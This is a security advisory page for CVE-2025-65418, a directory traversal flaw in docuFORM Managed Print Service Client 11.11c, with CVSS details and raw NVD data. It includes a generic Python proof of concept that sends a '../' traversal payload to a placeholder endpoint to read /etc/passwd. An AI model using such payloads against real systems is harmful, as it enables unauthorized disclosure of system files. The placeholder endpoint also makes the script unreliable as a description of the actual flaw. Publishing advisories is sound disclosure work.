Security Vulnerability Report
中文
CVE-2025-65418 CVSS 7.5 HIGH

CVE-2025-65418

Published: 2026-05-11 16:17:29
Last Modified: 2026-05-12 18:16:36

Description

docuFORM Managed Print Service Client 11.11c is vulnerable to a directory traversal allowing attackers to read arbitrary files via crafted url.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

docuFORM Managed Print Service Client 11.11c

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_poc(target_url): # PoC to check for directory traversal # Payload attempts to read /etc/passwd on Linux or win.ini on Windows payload = "../../../../../../../../etc/passwd" full_url = f"{target_url}/vulnerable_endpoint?file={payload}" try: response = requests.get(full_url, timeout=5) if response.status_code == 200 and "root:" in response.text: print(f"[+] Vulnerability confirmed at {target_url}") print(response.text[:200]) else: print("[-] Target does not appear vulnerable or payload failed.") except Exception as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": target = "http://127.0.0.1:8080" # Replace with actual target check_poc(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65418", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:29.267", "lastModified": "2026-05-12T18:16:36.280", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "docuFORM Managed Print Service Client 11.11c is vulnerable to a directory traversal allowing attackers to read arbitrary files via crafted url."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://ZeroBreach.de", "source": "[email protected]"}, {"url": "https://gist.github.com/ZeroBreach-GmbH/12c58d9286093a7b634d57df7b8b9386", "source": "[email protected]"}, {"url": "https://www.docuform.de/", "source": "[email protected]"}]}}